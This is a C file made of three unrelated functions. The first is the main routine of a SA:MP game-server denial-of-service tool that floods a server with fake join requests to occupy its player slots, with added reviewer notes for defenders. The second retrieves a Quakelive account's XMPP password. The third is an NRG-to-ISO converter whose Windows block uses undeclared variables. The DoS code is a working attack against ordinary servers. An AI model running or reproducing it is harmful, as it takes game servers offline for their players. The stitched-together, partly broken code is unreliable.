/*
 * Entry point of the SA:MP "invisible Fake Players" denial-of-service tool
 * (see the banner text below).
 *
 * What the code does, in order:
 *  1. parses -p PORT / -f and the trailing host[:port] argument
 *  2. sends one UDP query ("SAMP" + server address + port + 'i') and hands the
 *     reply to sampinfo()
 *  3. loops forever: a new UDP socket bound to another local port sends one
 *     join packet (version-dependent opcode byte followed by the password),
 *     then the socket is closed; this function sends nothing else for that
 *     session
 *
 * Reviewer notes for defenders:
 *  - on the wire this is a series of join requests from a single source
 *    address, each from a different source port, none followed by any
 *    in-session traffic
 *  - NOTE(review): what the server does with such a session (how long the
 *    slot stays occupied) is not visible here; a per-source-address cap on
 *    joins and a short timeout for sessions that never send data are the
 *    server-side controls to verify
 */
int main(int argc, char *argv[]) {
    struct  sockaddr_in peer, peerl;
    struct  linger  ling = {1,1};
    int     sd, i, len, ver = 1, z = 0, flood = 0, full = 0, joined = 0;
    u16     port = PORT;
    u8      *buff, pass[128], *host, *p;

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);   /* unbuffered stdout: progress text appears immediately */

    fputs("\n"
        "SA:MP invisible Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web: aluigi.org\n"
        "edit: by Hordejoy\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <host[:port]>\n"
            "\n"
            "-p PORT server port that you can specify also after host, default is %hu\n"
            "-f flooding option, perfect for slow connections or for testing servers\n"
            " with many slots\n"
            "\n", argv[0], port);
        exit(1);
    }

    /* the last argument is the host, so options are only looked for before it */
    argc--;
    for(i = 1; i < argc; i++) {
        /* every option must be exactly two characters: '-' or '/' plus a letter */
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            printf("\nError: wrong argument (%s)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) {
            case 'p': {
                if(!argv[++i]) exit(1);
                port = atoi(argv[i]);
            } break;
            case 'f': {
                flood = 1;
            } break;
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

    /* an optional ":port" suffix on the host overrides -p and the default */
    host = argv[argc];
    p = strchr(host, ':');
    if(p) {
        *p = 0;
        port = atoi(p + 1);
    }

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    /* local address used for bind() in the loop below; the starting port is
       derived from the current time */
    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    /* information query: "SAMP", the server's IPv4 address and port, then the
       letter 'i'; the reply overwrites the same buffer and is passed to
       sampinfo() */
    p = buff;
    p += putmm(p, "SAMP", 4);
    p += putxx(p, peer.sin_addr.s_addr,  32);
    p += putxx(p, ntohs(peer.sin_port),  16);
    p += putxx(p, 'i',                   8);
    len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1, 0);
    close(sd);
    sampinfo(buff, len);

    pass[0] = 0;    /* start with an empty password */

    /* VERSION */
    ver = 6;    // remember to change this one with new versions!
    /* VERSION */

    printf("- start attack:");
    for(;;) {
        printf("\n  Player: ");

        /* one fresh UDP socket per iteration */
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));

        /* keep stepping the local port until bind() accepts one; sin_port holds
           a network-byte-order value, so the ++ does not necessarily produce
           consecutive host-order port numbers */
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        /* per-version constants: the first byte of the join packet, the reply
           bytes this tool treats as "server full" and "joined", and the z flag
           handed to send_recv() (its meaning is defined outside this block) */
        p = buff;
        switch(ver) {
            case 1: {
                z      = 0;
                full   = 0x14;
                joined = 0x12;
                p += putxx(p, 0x03, 8);
                break;
            }
            case 2: {
                z      = 0;
                full   = 0x13;
                joined = 0x0b;
                p += putxx(p, 0x0a, 8);
                break;
            }
            case 3: {
                z      = 1;
                full   = 0x1d;
                joined = 0x10;
                p += putxx(p, 0x0f, 8);
                break;
            }
            case 4: {
                z      = 1;
                full   = 0x1b;
                joined = 0x11;
                p += putxx(p, 0x10, 8);
                break;
            }
            case 5: {
                z      = 0;
                full   = 0x21;
                joined = 0x18;
                p += putxx(p, 0x17, 8);
                break;
            }
            case 6: {
                z      = 0;
                full   = 0x1b;
                joined = 0x12;
                p += putxx(p, 0x11, 8);
                break;
            }
            default: {
                /* reached once ver has been decremented below 1, i.e. no
                   known version produced a reply */
                printf("\nError: socket timeout, no reply received\n");
                exit(1);
                break;
            }
        }
        /* the password follows the opcode; length -1 presumably means
           "copy up to the terminating NUL" - confirm in putmm() */
        p += putmm(p, pass, -1);

        len = p - buff;
        /* versions 5 and later pass the packet through samp03_crypt() before
           sending; the last argument differs between 5 and 6+ */
        if(ver == 5) len = samp03_crypt(buff, len, port, 1, 0);
        if(ver >= 6) len = samp03_crypt(buff, len, port, 1, 1);

        /* in flooding state (flood == 2) no receive buffer is supplied */
        len = send_recv(sd, buff, len, (flood == 2) ? NULL : buff, BUFFSZ, &peer, 0, z);
        close(sd);  /* the socket is dropped right after the exchange */
        if(len < 0) {
            /* no answer: retry with the previous protocol version */
            printf("\n- no reply I try with an older version\n");
            ver--;
            continue;
        }

        if(flood == 2) {
            /* flooding state: the reply is not inspected, only a fixed pause */
            waitms(FLOODMS);
            continue;
        }

        // seems not used
        //if(ver == 5) len = samp03_crypt(buff, len, port, 0, 0);
        //if(ver >= 6) len = samp03_crypt(buff, len, port, 0, 1);

        /* only the first byte of the reply is examined */
        if(buff[0] == full) {
            printf("server full");
            sleep(ONESEC);
            continue;
        }
        if(buff[0] != joined) {
            if((buff[0] == 0x13) || (buff[0] == 0x19)) {    // password wrong / password not set
                // version 2 doesn't want a password
                printf("\n- server is protected, insert the password:\n ");
                fgetz(pass, sizeof(pass));
                continue;
            }
            /* any other reply is reported and the loop simply goes on */
            printf("\n- unknown packet reply (%d)\n", buff[0]);
            //exit(1);
        } else {
            /* first accepted join with -f given: switch to flooding state */
            if(flood) {
                printf("\n- start flooding\n");
                flood = 2;
            }
        }
    }

    return(0);
}
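/*
 * Quakelive XMPP password retriever: logs in to the quakelive.com web site
 * with the account's mail address and password, then fetches the session data
 * and prints the XAID field, which the banner describes as the
 * xmpp.quakelive.com password.
 *
 * argv[1] = mail address, argv[2] = password; whichever is missing is asked
 * for interactively through fgetz().
 *
 * Security notes for whoever runs or audits this:
 * - a password given in argv[2] is visible to other local users in the
 *   process list while the tool runs; the interactive prompt avoids that
 * - the XAID is a credential and is printed to stdout in clear, so the output
 *   should not be redirected to a shared file or log
 * - NOTE(review): the Referer is an http:// URL; QLURL1/QLURL2 are defined
 *   outside this block, so confirm they use https:// before credentials are
 *   sent to them
 * - NOTE(review): mail and pass are copied into the form body without
 *   percent-encoding, so a password containing '&', '%', '+' or '=' is not
 *   transmitted as typed
 *
 * Always returns 0, also on error (unchanged contract).
 */
int main(int argc, char *argv[]) {
    mydown_options  opt;
    int     len,
            clen;
    u8      content[1024],
            *buff   = NULL,
            *mail   = NULL,
            *pass   = NULL,
            *xaid;

    fputs("\n"
        "Quakelive xmpp.quakelive.com password retriever "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web: aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        /* usage is only informational: missing values are prompted for below */
        printf("\n"
            "Usage: %s [mail_address] [password]\n"
            "\n", argv[0]);
    }

    if(argc >= 2) mail = argv[1];
    if(argc >= 3) pass = argv[2];
    if(!mail) mail = strdup(fgetz("enter the mail address of the account"));
    if(!pass) pass = strdup(fgetz("enter the password of the account"));
    if(!mail || !pass) {
        /* strdup() failed; the strchr() below would otherwise dereference NULL */
        printf("\nError: unable to read the mail address or the password\n");
        goto quit;
    }

    if(!strchr(mail, '@')) {
        printf("\nError: you must insert your account mail address, not the username\n");
        goto quit;
    }

    memset(&opt, 0, sizeof(opt));
    opt.verbose     = 0;
    opt.filedata    = &buff;    /* mydown() hands the reply back through buff */
    opt.referer     = "http://www.quakelive.com/";
    opt.more_http   = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n";

    /* a truncated body would silently send a different (shorter) password */
    clen = snprintf(content, sizeof(content), "submit=&email=%s&pass=%s", mail, pass);
    if((clen < 0) || ((size_t)clen >= sizeof(content))) {
        printf("\nError: the mail address and the password are too long\n");
        goto quit;
    }

    opt.get         = "POST";
    opt.content     = content;
    printf("- send mail and password to %s\n", QLURL1);
    len = mydown(QLURL1, NULL, &opt);
    if(len < 0) {
        printf("\nError: something wrong on the quakelive.com webserver\n");
        goto quit;
    }
    /* the login reply is not inspected; release it and clear the pointer so
       that the !buff test after the next request can never see a freed buffer
       (and mydown() is not handed a dangling pointer through opt.filedata) */
    free(buff);
    buff = NULL;

    opt.get         = "GET";
    opt.content     = NULL;
    opt.more_http   = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
                      "X-Requested-With: XMLHttpRequest\r\n";
    printf("- get session informations from %s\n", QLURL2);
    len = mydown(QLURL2, NULL, &opt);
    /* an empty reply cannot be NUL-terminated in place, so treat it as an error */
    if((len <= 0) || !buff) {
        printf("\nError: something wrong on the quakelive.com webserver\n");
        goto quit;
    }
    buff[len - 1] = 0;  /* terminate in place rather than realloc for one byte */

    xaid = strstr(buff, "\"XAID\":");
    if(!xaid) {
        printf("\n"
            "Error: no XAID field found, check the reply received from the server\n"
            "\n"
            "%s\n"
            "\n", buff);
    }

    /* show_qldata() is defined elsewhere; its return value is what gets shown
       as the XAID, presumably a pointer into buff - hence printed before free */
    xaid = show_qldata(buff, len);
    if(xaid) {
        printf(
            "- your current xmpp.quakelive.com password (XAID) is\n"
            "\n"
            "  %s\n"
            "\n", xaid);
    }

    free(buff);
quit:
    fgetz("press RETURN to quit");
    return(0);
}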
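/*
 * Copy the input image to the output while dropping its first 307200 bytes
 * (the nrg* names and messages suggest a Nero .nrg to ISO 9660 conversion).
 *
 * Input is the global `filename`, or stdin when it is a pipe/file.
 * Output is the global `destfile` when set and stdin is a terminal, else stdout.
 *
 * Returns 0 on success, 1 when there is nothing to do (input is already an
 * ISO image, or no input was given), and -1 on error (65535 once converted to
 * the unsigned return type; unchanged contract).
 *
 * NOTE(review): with `destfile` set and stdin not a terminal the data still
 * goes to stdout; left as in the original - confirm whether that is intended.
 */
unsigned short exec() {
    /* static: a 1 MiB automatic array can exhaust the default thread stack on
       some platforms, and nothing in this function calls it recursively */
    static char buffer[1024 * 1024];
    char        buffy[17 * 2048];   /* first 17 sectors, examined by is_iso() */
    size_t      size = 0, l, i;
    size_t      nrgSize = 0;
    struct stat buf;
    FILE        *nrgFile = NULL;
    FILE        *in;

#ifdef WIN32
    mywnd = GetForegroundWindow();
    if (GetWindowLong(mywnd, GWL_WNDPROC)) {
        p = argv[1];
        argv = malloc(sizeof(char *) * 3);
        if (!argv)
            return -1;
        if (argc < 2)
            argv[1] = get_file();
        else
            argv[1] = p;
        argv[2] = put_file(argv[1]);
        argc = 3;
        p = strrchr(argv[2], '.');
        /* NOTE(review): the capacity of the buffer returned by put_file() is
           not visible here; confirm it has room for the 4 appended bytes */
        if (!p || (strlen(p) != 4))
            strcat(argv[2], ".iso");
    }
#endif

    if (filename) {
        // reading data from a file
        if (stat(filename, &buf) != 0) {
            // specified input file doesn't exist
            printf("%s: No such file '%s'\n", __progname, filename);
            return -1;
        }
        if (buf.st_size < 1) {
            if (destfile)
                printf("%s: file '%s' is empty\n", __progname, filename);
            return -1;
        }
        nrgSize = (size_t)buf.st_size;

        if (!(nrgFile = fopen(filename, "rb"))) {
            /* the original format string was "%%s" and printed a literal %s */
            if (destfile)
                printf("unable to open the source file %s\n", filename);
            return -1;
        }
        if (fread(buffy, 1, sizeof(buffy), nrgFile) != sizeof(buffy)) {
            if (destfile)
                printf("unable to read the source file %s\n", filename);
            fclose(nrgFile);
            return -1;
        }
        if (is_iso(buffy)) {
            if (destfile)
                printf("%s: %s is already an ISO 9660 image\n", __progname, filename);
            if (destfile)
                printf("Nothing to do... exiting.\n");
            fclose(nrgFile);
            return 1;
        }
        /* the payload starts after the first 307200 bytes */
        if (fseek(nrgFile, 307200, SEEK_SET) != 0) {
            if (destfile)
                printf("unable to read the source file %s\n", filename);
            fclose(nrgFile);
            return -1;
        }
    } else {
        // no files specified
        if (isatty(fileno(stdin))) {
            // stdin is a terminal
            printf("please specify an input file\n");
            return 1;
        }
        // stdin is a file or a pipe: a short read would leave buffy partly
        // uninitialised for is_iso(), so it is treated as an error
        if (fread(buffy, 1, sizeof(buffy), stdin) != sizeof(buffy))
            return -1;
        if (is_iso(buffy))
            return 1;

        // skip the remainder of the first 307200 bytes, stopping at EOF
        long skip = 307200L - (long)sizeof(buffy);
        while (skip-- > 0) {
            if (fgetc(stdin) == EOF)
                break;
        }
    }

    in = (filename) ? nrgFile : stdin;

    if (destfile && isatty(fileno(stdin))) {
        // write to a file
        FILE    *isoFile;
        FILE    *probe;
        short   percent;
        short   old_percent = -1;

        /* Compare source and destination BEFORE opening the destination for
           writing: "wb+" truncates, so a later check would already have
           destroyed a source that is also the destination. Assumes same_file()
           takes two descriptors and returns 1 for the same file, as the
           original call implies - TODO confirm. */
        probe = fopen(destfile, "rb");
        if (probe) {
            int same = same_file(fileno(in), fileno(probe));
            fclose(probe);
            if (same == 1) {
                printf("%s: the source and the destination files are the same\n", __progname);
                if (filename)
                    fclose(nrgFile);
                return -1;
            }
        }

        isoFile = fopen(destfile, "wb+");
        if (!isoFile) {
            printf("\n%s: cannot write to file %s\n", __progname, destfile);
            if (filename)
                fclose(nrgFile);
            return -1;
        }

        while ((i = fread(buffer, 1, sizeof(buffer), in)) > 0) {
            if (fwrite(buffer, i, 1, isoFile) != 1) {
                printf("\n%s: cannot write to file %s\n", __progname, destfile);
                fclose(isoFile);
                if (filename)
                    fclose(nrgFile);
                return -1;
            }

            size += i;
            percent = (int)(size * 100.0 / nrgSize);

            /* redraw the bar only when the integer percentage changes */
            if (percent != old_percent) {
                old_percent = percent;
                printf("\r[");
                for (l = 0; l < percent * BAR_LENGTH / 100; l++)
                    printf("=");
                printf(">");
                l++;
                for (; l < BAR_LENGTH; l++)
                    printf(" ");
                printf("] %d%%", percent);
                fflush(stdout);
            }
        }

        printf("\r[");
        for (l = 0; l < BAR_LENGTH; l++)
            printf("=");
        printf("] 100%%");
        fflush(stdout);

        if (filename)
            fclose(nrgFile);
        /* fclose() flushes buffered data, so a failure here is a write error */
        if (fclose(isoFile) != 0) {
            printf("\n%s: cannot write to file %s\n", __progname, destfile);
            return -1;
        }
        /* cast: size is a size_t, the format expects unsigned long */
        printf("\n%s written: %lu bytes\n", destfile, (unsigned long)size);
    } else {
        // stdout
        while ((i = fread(buffer, 1, sizeof(buffer), in)) > 0) {
            if (fwrite(buffer, i, 1, stdout) != 1) {
                if (filename)
                    fclose(nrgFile);
                return -1;
            }
        }
        if (filename)
            fclose(nrgFile);
    }

#ifdef WIN32
    u8 ans[8];
    if (GetWindowLong(mywnd, GWL_WNDPROC)) {
        printf("\nPress ENTER to quit");
        fgetz(ans, sizeof(ans), stdin);
    }
#endif
    return 0;
}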